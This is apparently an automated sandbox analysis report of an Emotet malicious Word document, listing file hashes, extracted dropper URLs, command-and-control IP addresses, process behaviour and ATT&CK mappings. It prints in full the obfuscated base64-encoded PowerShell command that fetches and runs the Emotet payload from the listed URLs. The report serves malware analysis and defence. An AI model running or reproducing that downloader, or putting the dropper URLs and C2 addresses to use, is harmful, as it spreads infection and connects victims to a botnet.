emotet | aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63

General

Target

emotet_e1_aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63_2020-10-15__074121672394._doc.doc
Size

142KB
MD5

0b5d5c4468a31e83e1ec8a0d8b120496
SHA1

68ac3e73c7bb88172984109977a8dc0f2c095522
SHA256

aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63
SHA512

44b5682ac2f14a0de257bcab0eb42fc725536be8d9ecc432ca3a19ff3425c9b867a85b3d3b37cb1416f76b51d86ae2fcb563641f9fd6b18de0b34024dbc48fd1

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://ziaonlinetutor.com/wp-content/a/

exe.dropper

https://bharatlearningsolutions.com/content/MNd/

exe.dropper

https://trungtammtc.com/wp-admin/LP/

exe.dropper

http://bigprint.pictures/cgi-bin/o/

exe.dropper

https://avozdecamacari.com/home/000~ROOT~000/dev/shm/E/

exe.dropper

https://calculafacturaluz.com/sys-cache/9W/

exe.dropper

http://evisualsoft-001-site3.atempurl.com/wp-content/C7/

Extracted

Family

emotet

Botnet

Epoch1

C2

188.157.101.114:80

192.175.111.214:8080

95.85.33.23:8080

192.232.229.54:7080

181.30.61.163:443

186.70.127.199:8090

200.127.14.97:80

70.169.17.134:80

24.232.228.233:80

172.104.169.32:8080

50.28.51.143:8080

177.73.0.98:443

149.202.72.142:7080

37.187.161.206:8080

202.29.239.162:443

213.197.182.158:8080

202.134.4.210:7080

190.24.243.186:80

201.213.177.139:80

105.209.235.113:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

POwersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2672	3944	POwersheLL.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/1136-12-0x00000000022C0000-0x00000000022DF000-memory.dmp	emotet
behavioral2/memory/1136-13-0x00000000022E0000-0x00000000022FE000-memory.dmp	emotet
behavioral2/memory/488-16-0x0000000002100000-0x000000000211F000-memory.dmp	emotet
behavioral2/memory/488-17-0x0000000002120000-0x000000000213E000-memory.dmp	emotet

Blacklisted process makes network request 4 IoCs

Processes:

POwersheLL.exe

flow pid process

26 2672 POwersheLL.exe
28 2672 POwersheLL.exe
30 2672 POwersheLL.exe
32 2672 POwersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

X_ec45.exeWindows.AccountsControl.exe

pid process

1136 X_ec45.exe
488 Windows.AccountsControl.exe
Drops file in System32 directory 1 IoCs

Processes:

X_ec45.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe X_ec45.exe

flow	pid	process
26	2672	POwersheLL.exe
28	2672	POwersheLL.exe
30	2672	POwersheLL.exe
32	2672	POwersheLL.exe

pid	process
1136	X_ec45.exe
488	Windows.AccountsControl.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe	X_ec45.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3956 WINWORD.EXE
3956 WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

POwersheLL.exeWindows.AccountsControl.exe

pid	process
2672	POwersheLL.exe
2672	POwersheLL.exe
2672	POwersheLL.exe
488	Windows.AccountsControl.exe
488	Windows.AccountsControl.exe
488	Windows.AccountsControl.exe
488	Windows.AccountsControl.exe
488	Windows.AccountsControl.exe
488	Windows.AccountsControl.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

POwersheLL.exe

description pid process

Token: SeDebugPrivilege 2672 POwersheLL.exe

description	pid	process
Token: SeDebugPrivilege	2672	POwersheLL.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

WINWORD.EXEX_ec45.exeWindows.AccountsControl.exe

pid	process
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
3956	WINWORD.EXE
1136	X_ec45.exe
488	Windows.AccountsControl.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

POwersheLL.exeX_ec45.exe

description	pid	process	target process
PID 2672 wrote to memory of 1136	2672	POwersheLL.exe	X_ec45.exe
PID 2672 wrote to memory of 1136	2672	POwersheLL.exe	X_ec45.exe
PID 2672 wrote to memory of 1136	2672	POwersheLL.exe	X_ec45.exe
PID 1136 wrote to memory of 488	1136	X_ec45.exe	Windows.AccountsControl.exe
PID 1136 wrote to memory of 488	1136	X_ec45.exe	Windows.AccountsControl.exe
PID 1136 wrote to memory of 488	1136	X_ec45.exe	Windows.AccountsControl.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_aa7280fb05501f752d412d103bd48c86094cc49ea8f3d9f6b3ab458a64997f63_2020-10-15__074121672394._doc.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3956

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABNAGEAMQB0AHIAZQBmAD0AKAAoACcAUgAnACsAJwBrADQAJwApACsAJwA2AHUAJwArACcAeABwACcAKQA7ACQATQB1AG4AbAB3ADIAcwA9ACQAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABlADkAawBpAHcAMQA9ACgAJwBJAHYAJwArACgAJwA3AHgAZQAnACsAJwB5AG4AJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABFAG4AdgA6AFUAUwBlAHIAcAByAG8AZgBpAGwARQBcAG8AdwBnAFkAXwBQAE0AXABnAHQARwBtAF8AWQA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAGUAYwBUAE8AUgBZADsAJABTAHIANQB2AGIAXwAzAD0AKAAoACcATQBnACcAKwAnAF8AMQB4ACcAKQArACcAcwAnACsAJwA4ACcAKQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAUwBlAEMAVQBgAFIAaQB0AGAAeQBwAHIATwBgAFQAbwBjAG8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAJwArACgAJwBzADEAMgAsACAAJwArACcAdABsAHMAMQAnACsAJwAxACcAKQArACcALAAnACsAKAAnACAAdABsACcAKwAnAHMAJwApACkAOwAkAEMAcwBoADcAMgB1AHgAPQAoACgAJwBIAGkAZwAnACsAJwA3AGoAJwApACsAJwBzADcAJwApADsAJABZAHoAYwBlAGYAawBfACAAPQAgACgAJwBYACcAKwAnAF8AZQAnACsAKAAnAGMAJwArACcANAA1ACcAKQApADsAJABFAG4AcwA0AGMAdwBhAD0AKAAnAFcAJwArACgAJwB6AGoAdAB4AHEAJwArACcAcwAnACkAKQA7ACQARQA2ADkAawA0ADQAOAA9ACgAJwBaACcAKwAoACcAawBfADQAeQAnACsAJwBuADYAJwApACkAOwAkAEwAeABtAHMAOABvAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0ATwAnACsAJwB3ACcAKwAnAGcAeQAnACsAJwBfAHAAbQB7ADAAfQBHAHQAJwArACcAZwBtACcAKwAnAF8AeQA1AHsAMAB9ACcAKQAtAGYAWwBDAGgAYQByAF0AOQAyACkAKwAkAFkAegBjAGUAZgBrAF8AKwAoACgAJwAuACcAKwAnAGUAeAAnACkAKwAnAGUAJwApADsAJABHADYAYgBzAGoAMgB2AD0AKAAnAEgAbwAnACsAKAAnAG0AaABfACcAKwAnAF8AJwApACsAJwBqACcAKQA7ACQASwBoAHYAdwAwAG0AZgA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAATgBlAFQALgB3AEUAYgBDAEwASQBFAE4AVAA7ACQARwAyADIAeQBoAHQAagA9ACgAJwBoAHQAJwArACcAdAAnACsAKAAnAHAAJwArACcAcwA6AC8ALwAnACkAKwAoACcAegAnACsAJwBpAGEAbwBuAGwAaQBuAGUAJwArACcAdAB1ACcAKwAnAHQAJwApACsAKAAnAG8AcgAnACsAJwAuAGMAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGMAJwArACcAbwBuAHQAZQBuACcAKwAnAHQALwAnACkAKwAnAGEAJwArACcALwAqACcAKwAoACcAaAB0AHQAJwArACcAcAAnACkAKwAnAHMAOgAnACsAJwAvACcAKwAoACcALwBiACcAKwAnAGgAYQByAGEAdAAnACsAJwBsAGUAYQAnACkAKwAnAHIAJwArACgAJwBuACcAKwAnAGkAbgAnACkAKwAoACcAZwBzAG8AJwArACcAbAB1AHQAaQAnACkAKwAoACcAbwAnACsAJwBuAHMAJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwBjACcAKwAnAG8AJwApACsAJwBuAHQAJwArACcAZQBuACcAKwAoACcAdAAvACcAKwAnAE0AJwApACsAKAAnAE4AZAAnACsAJwAvACoAJwArACcAaAB0AHQAJwArACcAcABzADoALwAnACkAKwAoACcALwB0AHIAJwArACcAdQAnACkAKwAoACcAbgAnACsAJwBnAHQAJwApACsAJwBhACcAKwAoACcAbQAnACsAJwBtAHQAYwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8ATABQAC8AKgAnACkAKwAoACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBiAGkAZwAnACsAJwBwAHIAaQBuAHQAJwApACsAJwAuAHAAJwArACgAJwBpAGMAJwArACcAdAAnACsAJwB1AHIAZQBzAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4ALwAnACsAJwBvAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAJwB0AHAAJwArACcAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwBhAHYAbwB6ACcAKwAnAGQAZQBjAGEAbQAnACsAJwBhACcAKQArACcAYwAnACsAKAAnAGEAcgBpACcAKwAnAC4AYwBvAG0AJwApACsAJwAvAGgAJwArACgAJwBvAG0AZQAnACsAJwAvADAAJwApACsAJwAwADAAJwArACgAJwB+AFIAJwArACcATwBPACcAKwAnAFQAfgAwADAAMAAnACsAJwAvACcAKQArACgAJwBkAGUAJwArACcAdgAnACkAKwAoACcALwBzACcAKwAnAGgAbQAvACcAKQArACgAJwBFAC8AKgBoAHQAJwArACcAdABwAHMAJwApACsAJwA6AC8AJwArACgAJwAvACcAKwAnAGMAYQBsACcAKQArACcAYwB1ACcAKwAoACcAbAAnACsAJwBhAGYAJwApACsAJwBhACcAKwAnAGMAdAAnACsAJwB1AHIAJwArACgAJwBhAGwAJwArACcAdQAnACkAKwAoACcAegAuACcAKwAnAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHMAeQAnACkAKwAoACcAcwAnACsAJwAtAGMAJwApACsAJwBhACcAKwAoACcAYwBoAGUALwAnACsAJwA5ACcAKwAnAFcALwAqACcAKQArACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAGUAdgBpACcAKQArACgAJwBzAHUAYQAnACsAJwBsACcAKQArACgAJwBzAG8AJwArACcAZgAnACkAKwAoACcAdAAnACsAJwAtADAAMAAxAC0AcwBpAHQAZQAzACcAKwAnAC4AJwApACsAJwBhACcAKwAnAHQAZQAnACsAKAAnAG0AcAB1AHIAbAAnACsAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0ALwAnACsAJwB3AHAAJwArACgAJwAtAGMAbwBuACcAKwAnAHQAJwApACsAJwBlACcAKwAoACcAbgB0AC8AJwArACcAQwAnACsAJwA3AC8AJwApACkALgAiAFMAcABgAEwASQBUACIAKAAkAE0AdQBuAGwAdwAyAHMAKQA7ACQASwA4ADkAaQA3AHUANgA9ACgAKAAnAE0AJwArACcAbAA1ADMAeAAnACkAKwAnAGkAJwArACcAZwAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEgAeAB4AGoAbwA4ADkAIABpAG4AIAAkAEcAMgAyAHkAaAB0AGoAKQB7AHQAcgB5AHsAJABLAGgAdgB3ADAAbQBmAC4AIgBEAE8AdwBuAEwATwBBAGQAZgBgAGkAYABMAEUAIgAoACQASAB4AHgAagBvADgAOQAsACAAJABMAHgAbQBzADgAbwBqACkAOwAkAFYAcQBrADMAcABfADUAPQAoACcARwB5ACcAKwAoACcAYQBwACcAKwAnAHIAJwApACsAJwAxAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAeABtAHMAOABvAGoAKQAuACIAbABgAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADMAOQA4ADIAMAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABMAHgAbQBzADgAbwBqACkAOwAkAEwAbgAzAHEAdwAwADEAPQAoACcAUgBiACcAKwAoACcAOQAnACsAJwA4ADUAJwApACsAJwB4AGIAJwApADsAYgByAGUAYQBrADsAJABXAG0AdQB6AHIAZQBwAD0AKAAnAE0AXwAnACsAJwBpAHQAJwArACgAJwBxACcAKwAnADcAMwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwAxAGgANwBwAGIAaQA9ACgAJwBPADQAJwArACcAMgAnACsAKAAnADAAJwArACcAOAB1AHAAJwApACkA
1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672

C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
"C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1136

C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe
"C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:488

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Owgy_pm\Gtgm_y5\X_ec45.exe
MD5
3b7449cd8c9047abebf15753df263af6

SHA1
7e48a9edf1700393af6368b8b8de7ec3f4828f87

SHA256
537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7

SHA512
300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

Download Submit
C:\Users\Admin\owgY_PM\gtGm_Y5\X_ec45.exe
MD5
3b7449cd8c9047abebf15753df263af6

SHA1
7e48a9edf1700393af6368b8b8de7ec3f4828f87

SHA256
537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7

SHA512
300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

Download Submit
C:\Windows\SysWOW64\apds\Windows.AccountsControl.exe
MD5
3b7449cd8c9047abebf15753df263af6

SHA1
7e48a9edf1700393af6368b8b8de7ec3f4828f87

SHA256
537d9115a8b97d2c1279ce76870acd5e08efedda770f86f2e78e24222b443de7

SHA512
300ac2ffe1afe575aca3adfa73532b939f9c7132c3e0833ae30a6dfa320a06381cd5836dca19014388500c996b0988a8d3ef44749bea00911117ab959215ec07

Download Submit
memory/488-14-0x0000000000000000-mapping.dmp

Download
memory/488-16-0x0000000002100000-0x000000000211F000-memory.dmp

Filesize
124KB

Download
memory/488-17-0x0000000002120000-0x000000000213E000-memory.dmp

Filesize
120KB

Download
memory/1136-9-0x0000000000000000-mapping.dmp

Download
memory/1136-12-0x00000000022C0000-0x00000000022DF000-memory.dmp

Filesize
124KB

Download
memory/1136-13-0x00000000022E0000-0x00000000022FE000-memory.dmp

Filesize
120KB

Download
memory/2672-8-0x0000029C73600000-0x0000029C73601000-memory.dmp

Filesize
4KB

Download
memory/2672-7-0x0000029C73450000-0x0000029C73451000-memory.dmp

Filesize
4KB

Download
memory/2672-6-0x00007FF8FA470000-0x00007FF8FAE5C000-memory.dmp

Filesize
9.9MB

Download
memory/3956-0-0x00007FF901A90000-0x00007FF902156000-memory.dmp

Filesize
6.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads